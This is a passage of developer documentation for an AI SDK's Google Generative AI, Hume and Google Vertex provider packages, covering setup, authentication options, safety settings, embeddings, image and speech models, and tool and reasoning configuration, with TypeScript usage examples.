The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
Troubleshooting
Schema Limitations
The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
const { object } = await generateObject({
model: google('gemini-2.5-flash'),
providerOptions: {
google: {
structuredOutputs: false,
},
},
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Generative AI:
- `z.union`
- `z.record`
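Where your data allows it, you can instead reformulate the schema without unions and keep structured outputs enabled. A sketch of one such reformulation of the example above (it replaces the discriminated union with a shared shape and an enum tag):
import { z } from 'zod';
// Both union branches had the same fields, so an enum tag suffices.
const schema = z.object({
  name: z.string(),
  age: z.number(),
  contact: z.object({
    type: z.enum(['email', 'phone']),
    value: z.string(),
  }),
});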
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Google Search | URL Context |
|---|---|---|---|---|---|---|
| gemini-3.1-pro-preview | | | | | | |
| gemini-3.1-flash-image-preview | | | | | | |
| gemini-3-pro-preview | | | | | | |
| gemini-2.5-pro | | | | | | |
| gemini-2.5-flash | | | | | | |
| gemini-2.5-flash-lite | | | | | | |
| gemini-2.5-flash-lite-preview-06-17 | | | | | | |
| gemini-2.0-flash | | | | | | |
| gemini-1.5-pro | | | | | | |
| gemini-1.5-pro-latest | | | | | | |
| gemini-1.5-flash | | | | | | |
| gemini-1.5-flash-latest | | | | | | |
| gemini-1.5-flash-8b | | | | | | |
| gemini-1.5-flash-8b-latest | | | | | | |
Gemma Models
You can use Gemma models with the Google Generative AI API.
Gemma models don't natively support the systemInstruction parameter, but the provider automatically handles system instructions by prepending them to the first user message. This allows you to use system instructions with Gemma models seamlessly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemma-3-27b-it'),
system: 'You are a helpful assistant that responds concisely.',
prompt: 'What is machine learning?',
});
The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.
Embedding Models
You can create models that call the Google Generative AI embeddings API
using the .textEmbedding() factory method.
const model = google.textEmbedding('gemini-embedding-2-preview');
The Google Generative AI provider sends API calls to the right endpoint based on the type of embedding:
- Single embeddings: When embedding a single value with `embed()`, the provider uses the single `:embedContent` endpoint, which typically has higher rate limits compared to the batch endpoint.
- Batch embeddings: When embedding multiple values with `embedMany()` or multiple values in `embed()`, the provider uses the `:batchEmbedContents` endpoint.
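A minimal sketch of the two call shapes; the endpoint selection happens inside the provider:
import { google } from '@ai-sdk/google';
import { embed, embedMany } from 'ai';
const model = google.textEmbedding('gemini-embedding-2-preview');
// Single value: routed to the :embedContent endpoint.
const { embedding } = await embed({ model, value: 'hello world' });
// Multiple values: routed to the :batchEmbedContents endpoint.
const { embeddings } = await embedMany({
  model,
  values: ['hello world', 'goodbye world'],
});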
Google Generative AI embedding models support additional settings, including multimodal embeddings. You can pass them as an options argument:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embed } from 'ai';
const model = google.textEmbedding('gemini-embedding-2-preview');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
google: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (a single entry here, matching the single value)
} satisfies GoogleEmbeddingModelOptions,
},
});
When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
model: google.textEmbedding('gemini-embedding-2-preview'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
providerOptions: {
google: {
// content array must have the same length as values
content: [
[{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
null, // text-only, pairs with values[1]
],
} satisfies GoogleEmbeddingModelOptions,
},
});
The following optional provider options are available for Google Generative AI embedding models:
- `outputDimensionality` (number): Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- `taskType` (string): Optional. Specifies the task type for generating embeddings. Supported task types include:
  - `SEMANTIC_SIMILARITY`: Optimized for text similarity.
  - `CLASSIFICATION`: Optimized for text classification.
  - `CLUSTERING`: Optimized for clustering texts based on similarity.
  - `RETRIEVAL_DOCUMENT`: Optimized for document retrieval.
  - `RETRIEVAL_QUERY`: Optimized for query-based retrieval.
  - `QUESTION_ANSWERING`: Optimized for answering questions.
  - `FACT_VERIFICATION`: Optimized for verifying factual information.
  - `CODE_RETRIEVAL_QUERY`: Optimized for retrieving code blocks based on natural language queries.
- `content` (array): Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index; its parts are merged with the text value in the request. Use `null` for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either `{ text: string }` or `{ inlineData: { mimeType: string, data: string } }`. Supported by `gemini-embedding-2-preview`.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions | Multimodal |
|---|---|---|---|
| gemini-embedding-001 | 3072 | | |
| gemini-embedding-2-preview | 3072 | | |
Image Models
You can create Imagen models that call the Google Generative AI API using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { google } from '@ai-sdk/google';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
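The returned image exposes base64 and uint8Array views of its data; a sketch for saving it in Node.js (the file name is illustrative):
import fs from 'node:fs';
fs.writeFileSync('cityscape.png', image.uint8Array);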
Further configuration can be done using Google provider options. You can validate the provider options using the GoogleGenerativeAIImageProviderOptions type.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIImageProviderOptions } from '@ai-sdk/google';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
providerOptions: {
google: {
personGeneration: 'dont_allow',
} satisfies GoogleGenerativeAIImageProviderOptions,
},
// ...
});
The following provider options are available:
- `personGeneration` (`allow_adult` | `allow_all` | `dont_allow`): Whether to allow person generation. Defaults to `allow_adult`.
Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
title: Hume
description: Learn how to use the Hume provider for the AI SDK.
Hume Provider
The Hume provider contains language model support for the Hume transcription API.
Setup
The Hume provider is available in the @ai-sdk/hume module. You can install it with:
pnpm add @ai-sdk/hume
Provider Instance
You can import the default provider instance hume from @ai-sdk/hume:
import { hume } from '@ai-sdk/hume';
If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:
import { createHume } from '@ai-sdk/hume';
const hume = createHume({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Hume provider instance:
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `HUME_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the Hume speech API
using the .speech() factory method.
const model = hume.speech();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
providerOptions: { hume: {} },
});
The following provider options are available:
- `context` (object): Either:
  - `{ generationId: string }`: A generation ID to use for context.
  - `{ utterances: HumeUtterance[] }`: An array of utterance objects for context.
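For example, a sketch that continues an earlier generation for consistent prosody ('previous-generation-id' is a placeholder for an id returned by an earlier call):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
  model: hume.speech(),
  text: 'And here is a follow-up sentence.',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  providerOptions: {
    hume: { context: { generationId: 'previous-generation-id' } },
  },
});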
Model Capabilities
| Model | Instructions |
|---|---|
| default | |
title: Google Vertex AI
description: Learn how to use the Google Vertex AI provider.
Google Vertex Provider
The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models, Anthropic's Claude partner models, and MaaS (Model as a Service) open models.
Setup
The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with:
pnpm add @ai-sdk/google-vertex
Google Vertex Provider Usage
The Google Vertex provider instance is used to create model instances that call the Vertex AI API. The models available with this provider include Google's Gemini models. If you're looking to use Anthropic's Claude models, see the Google Vertex Anthropic Provider section below.
Provider Instance
You can import the default provider instance vertex from @ai-sdk/google-vertex:
import { vertex } from '@ai-sdk/google-vertex';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Google Vertex supports two different authentication implementations depending on your runtime environment.
Node.js Runtime
The Node.js runtime is the default runtime supported by the AI SDK. It supports all standard Google Cloud authentication options through the google-auth-library. Typical use involves setting a path to a json credentials file in the GOOGLE_APPLICATION_CREDENTIALS environment variable. The credentials file can be obtained from the Google Cloud Console.
If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleAuthOptions` (object): Optional. The authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - `authClient` (object): An `AuthClient` to use.
  - `keyFilename` (string): Path to a .json, .pem, or .p12 key file.
  - `keyFile` (string): Path to a .json, .pem, or .p12 key file.
  - `credentials` (object): Object containing `client_email` and `private_key` properties, or the external account client options.
  - `clientOptions` (object): Options object passed to the constructor of the client.
  - `scopes` (string | string[]): Required scopes for the desired API request.
  - `projectId` (string): Your project ID.
  - `universeDomain` (string): The default service domain for a given Cloud universe.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `baseURL` (string): Optional. Base URL for the Google Vertex API calls, e.g. to use proxy servers. By default, it is constructed using the location and project: `https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google`
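For example, a sketch that routes Vertex calls through a proxy (the proxy URL is a placeholder):
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
  // The path must mirror the default structure shown above.
  baseURL:
    'https://my-proxy.example.com/v1/projects/my-project/locations/us-central1/publishers/google',
});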
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:
import { vertex } from '@ai-sdk/google-vertex/edge';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex/edge';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
These values can be obtained from a service account JSON file from the Google Cloud Console.
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleCredentials` (object): Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - `clientEmail` (string): The client email from the service account JSON file. Defaults to the contents of the `GOOGLE_CLIENT_EMAIL` environment variable.
  - `privateKey` (string): The private key from the service account JSON file. Defaults to the contents of the `GOOGLE_PRIVATE_KEY` environment variable.
  - `privateKeyId` (string): The private key ID from the service account JSON file (optional). Defaults to the contents of the `GOOGLE_PRIVATE_KEY_ID` environment variable.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Vertex API using the provider instance.
The first argument is the model id, e.g. gemini-1.5-pro.
const model = vertex('gemini-1.5-pro');
Google Vertex models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = vertex('gemini-1.5-pro');
await generateText({
model,
providerOptions: {
google: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
},
},
});
The following optional provider options are available for Google Vertex models:
- `structuredOutputs` (boolean): Optional. Enable structured output. Default is true. This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to. See Troubleshooting: Schema Limitations for more details.
- `safetySettings` (Array<{ category: string; threshold: string }>): Optional. Safety settings for the model.
  - `category` (string): The category of the safety setting. Can be one of the following:
    - `HARM_CATEGORY_UNSPECIFIED`
    - `HARM_CATEGORY_HATE_SPEECH`
    - `HARM_CATEGORY_DANGEROUS_CONTENT`
    - `HARM_CATEGORY_HARASSMENT`
    - `HARM_CATEGORY_SEXUALLY_EXPLICIT`
    - `HARM_CATEGORY_CIVIC_INTEGRITY`
  - `threshold` (string): The threshold of the safety setting. Can be one of the following:
    - `HARM_BLOCK_THRESHOLD_UNSPECIFIED`
    - `BLOCK_LOW_AND_ABOVE`
    - `BLOCK_MEDIUM_AND_ABOVE`
    - `BLOCK_ONLY_HIGH`
    - `BLOCK_NONE`
- `audioTimestamp` (boolean): Optional. Enables timestamp understanding for audio files. Defaults to false. This is useful for generating transcripts with accurate timestamps (see the sketch after this list). Consult Google's documentation for usage details.
- `labels` (object): Optional. Defines labels used in billing reports. Consult Google's documentation for usage details.
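As referenced under audioTimestamp above, here is a sketch of a timestamped transcription request (the audio path is a placeholder):
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
import fs from 'node:fs';
const { text } = await generateText({
  model: vertex('gemini-2.5-flash'),
  providerOptions: {
    google: { audioTimestamp: true },
  },
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Transcribe this audio with timestamps.' },
        {
          type: 'file',
          data: fs.readFileSync('./data/recording.mp3'),
          mediaType: 'audio/mpeg',
        },
      ],
    },
  ],
});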
You can use Google Vertex language models to generate text with the generateText function:
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-1.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Vertex language models can also be used in the streamText function
(see AI SDK Core).
Code Execution
With Code Execution, certain Gemini models on Vertex AI can generate and execute Python code. This allows the model to perform calculations, data manipulation, and other programmatic tasks to enhance its responses.
You can enable code execution by adding the code_execution tool to your request.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { code_execution: vertex.tools.codeExecution({}) },
prompt:
'Use python to calculate 20th fibonacci number. Then find the nearest palindrome to it.',
});
The response will contain tool-call and tool-result parts for the executed code.
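A quick sketch for inspecting them on the result:
console.log(result.toolCalls); // the generated Python code
console.log(result.toolResults); // the execution output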
URL Context
URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { url_context: vertex.tools.urlContext({}) },
prompt: 'What are the key points from https://example.com/article?',
});
Google Search
Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { google_search: vertex.tools.googleSearch({}) },
prompt: 'What are the latest developments in AI?',
});
Enterprise Web Search
Enterprise Web Search provides grounding using a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and the public sector. Unlike standard Google Search grounding, Enterprise Web Search does not log customer data and supports VPC service controls. Supported models: Gemini 2.0 and newer.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
},
prompt: 'What are the latest FDA regulations for clinical trials?',
});
Google Maps
Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
google_maps: vertex.tools.googleMaps({}),
},
providerOptions: {
google: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
},
},
prompt: 'What are the best Italian restaurants nearby?',
});
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.
Reasoning (Thinking Tokens)
Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.
To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. Since the Vertex provider uses the Google provider's underlying language model, these options are passed through providerOptions.google:
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google'; // Note: importing from @ai-sdk/google
import { generateText, streamText } from 'ai';
// For generateText:
const { text, reasoningText, reasoning } = await generateText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
google: {
// Options are nested under 'google' for Vertex provider
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleGenerativeAIProviderOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);
// For streamText:
const result = streamText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
google: {
// Options are nested under 'google' for Vertex provider
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleGenerativeAIProviderOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.
- In `generateText`, these contribute to the `reasoningText` (string) and `reasoning` (array) fields.
- In `streamText`, these are emitted as `reasoning` stream parts.
File Inputs
The Google Vertex provider supports file inputs, e.g. PDF files.
import { vertex } from '@ai-sdk/google-vertex';
import fs from 'node:fs';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-1.5-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
For more details, see the Google Vertex AI documentation on grounding with Google Search.
Troubleshooting
Schema Limitations
The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
const result = await generateObject({
model: vertex('gemini-1.5-pro'),
providerOptions: {
google: {
structuredOutputs: false,
},
},
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known to not work with Google Vertex:
- `z.union`
- `z.record`
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemini-2.0-flash-001 | | | | |
| gemini-2.0-flash-exp | | | | |
| gemini-1.5-flash | | | | |
| gemini-1.5-pro | | | | |
Embedding Models
You can create models that call the Google Vertex AI embeddings API using the .textEmbeddingModel() factory method:
const model = vertex.textEmbeddingModel('text-embedding-004');
Google Vertex AI embedding models support additional settings. You can pass them as an options argument:
import { vertex } from '@ai-sdk/google-vertex';
import { embed } from 'ai';
const model = vertex.textEmbeddingModel('text-embedding-004');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
google: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
autoTruncate: false, // optional
},
},
});
The following optional provider options are available for Google Vertex AI embedding models:
- `outputDimensionality` (number): Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- `taskType` (string): Optional. Specifies the task type for generating embeddings. Supported task types include:
  - `SEMANTIC_SIMILARITY`: Optimized for text similarity.
  - `CLASSIFICATION`: Optimized for text classification.
  - `CLUSTERING`: Optimized for clustering texts based on similarity.
  - `RETRIEVAL_DOCUMENT`: Optimized for document retrieval.
  - `RETRIEVAL_QUERY`: Optimized for query-based retrieval.
  - `QUESTION_ANSWERING`: Optimized for answering questions.
  - `FACT_VERIFICATION`: Optimized for verifying factual information.
  - `CODE_RETRIEVAL_QUERY`: Optimized for retrieving code blocks based on natural language queries.
- `title` (string): Optional. The title of the document being embedded. This helps the model produce better embeddings by providing additional context. Only valid when `taskType` is set to `'RETRIEVAL_DOCUMENT'`.
- `autoTruncate` (boolean): Optional. When set to `true`, input text will be truncated if it exceeds the maximum length. When set to `false`, an error is returned if the input text is too long. Defaults to `true`.
Model Capabilities
| Model | Max Values Per Call | Parallel Calls | Multimodal |
|---|---|---|---|
| text-embedding-005 | 2048 | | |
| gemini-embedding-2-preview | 2048 | | |
Image Models
You can create Imagen models that call the Imagen on Vertex AI API
using the .image() factory method. For more on image generation with the AI SDK see generateImage().
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageProviderOptions type.
import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageProviderOptions } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
providerOptions: {
vertex: {
negativePrompt: 'pixelated, blurry, low-quality',
} satisfies GoogleVertexImageProviderOptions,
},
// ...
});
The following provider options are available:
- `negativePrompt` (string): A description of what to discourage in the generated images.
- `personGeneration` (`allow_adult` | `allow_all` | `dont_allow`): Whether to allow person generation. Defaults to `allow_adult`.
- `safetySetting` (`block_low_and_above` | `block_medium_and_above` | `block_only_high` | `block_none`): Whether to block unsafe content. Defaults to `block_medium_and_above`.
- `addWatermark` (boolean): Whether to add an invisible watermark to the generated images. Defaults to `true`.
- `storageUri` (string): Cloud Storage URI to store the generated images.
Additional information about the images can be retrieved using Google Vertex provider metadata.
import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: vertex.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
console.log(
`Revised prompt: ${providerMetadata.vertex.images[0].revisedPrompt}`,
);
Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-3.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-generate-002 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-3.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Google Vertex Anthropic Provider Usage
The Google Vertex Anthropic provider for the AI SDK offers support for Anthropic's Claude models through the Google Vertex AI APIs. This section provides details on how to set up and use the Google Vertex Anthropic provider.
Provider Instance
You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Node.js Runtime
For Node.js environments, the Google Vertex Anthropic provider supports all standard Google Cloud authentication options through the google-auth-library. You can customize the authentication options by passing them to the createVertexAnthropic function:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
const vertexAnthropic = createVertexAnthropic({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the Google Vertex Anthropic provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleAuthOptions` (object): Optional. The authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - `authClient` (object): An `AuthClient` to use.
  - `keyFilename` (string): Path to a .json, .pem, or .p12 key file.
  - `keyFile` (string): Path to a .json, .pem, or .p12 key file.
